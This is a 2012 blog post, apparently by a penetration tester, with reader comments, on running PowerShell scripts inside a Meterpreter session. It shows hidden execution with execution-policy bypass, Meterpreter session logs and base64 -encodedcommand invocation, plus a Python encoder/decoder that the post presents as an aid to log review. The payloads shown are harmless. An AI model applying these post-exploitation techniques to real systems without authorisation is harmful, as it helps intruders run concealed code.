Thursday, October 11, 2012

Run a PowerShell module in Meterpreter


I don't know why, but PowerShell and Meterpreter just don't play nice.

Part of it is the whole interactive shell-ness of PowerShell: if you just type "powershell" once you drop to a cmd.exe, you won't ever get the PowerShell prompt back.

In a similar vein, I've been unable to get any combination of execute -f powershell.exe -a "blah blah" to work either. If anyone has the magic syntax, I know lots of people who would be interested. (Actually Carlos Perez hooked me up... answer below.)

So, you can run PowerShell scripts via .bat files, and those execute just fine from within cmd.exe, from the "execute" command, or via the -encodedcommand [command] approach described below.


C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\do_neat_ps_stuff.ps1

Example:

meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter > 
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400

Carlos Perez mentioned at DerbyCon that you can also do the following:

On Linux, download this script: https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py or, if on Windows, download the EXE: https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.exe

You can use it to encode a script and then run it like so:

msf  exploit(handler) > 
[*] Sending stage (752128 bytes) to 192.168.1.225
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.225:49163) at 2012-09-17 15:58:33 -0400

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell 
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\carlos\Desktop>powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=
powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=
hello world

C:\Users\carlos\Desktop>
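What that blob actually is: -EncodedCommand takes base64 over the UTF-16LE bytes of the script text. The Python below is an added example, not from the post and not Carlos's ps_encoder: it builds the string the way PowerShell expects it and, for anyone reviewing process-creation logs, recovers the plaintext from a command line like the one above. Function names are mine; the sample command line is the one from the transcript above, and -e/-ec/-enc are PowerShell's accepted abbreviations of the flag.

```python
import base64
import re

# Command line taken from the session transcript above (not constructed).
SAMPLE_CMDLINE = ("powershell.exe -encodedcommand "
                  "dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=")

# PowerShell accepts unambiguous prefixes of the parameter name, so logs show
# -e, -ec, -enc or -EncodedCommand in any case; match all of them.
_ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/]e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]+)")


def encode_command(script_text: str) -> str:
    """Produce the string PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script_text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the plaintext script carried by -EncodedCommand, or None if the
    command line has no such flag or the payload is not valid base64/UTF-16LE."""
    m = _ENC_FLAG.search(command_line)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate padding stripped by a log pipeline
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")  # odd byte counts raise here
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))  # write-host hello world
```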
CG

2 comments:

Russel Van Tuyl said...

Would something like this work:

C:\WINDOWS\system32\cmd.exe /c powershell -command `"& {Set-ExecutionPolicy Unrestricted -Force}`" && powershell -File `"C:\sript1.ps1`"

mihi said...

Set-ExecutionPolicy requires admin privileges; on the other hand

powershell -NoProfile -ExecutionPolicy Unrestricted .\script.ps1

works fine even without admin privileges.

Note that the default PowerShell host (ConsoleHost) depends a lot on having a native console available - even executing a console application or trying to read input is done via the native console instead of using standard input/output streams.

An alternative might be to implement an alternative Host class, like my StreamHost.

I tried to implement that as a PowerShell script, but failed due to the fact I could not read from the standard
input stream without hanging the ConsoleHost that is used to execute the script.

Maybe someone else is more successful there.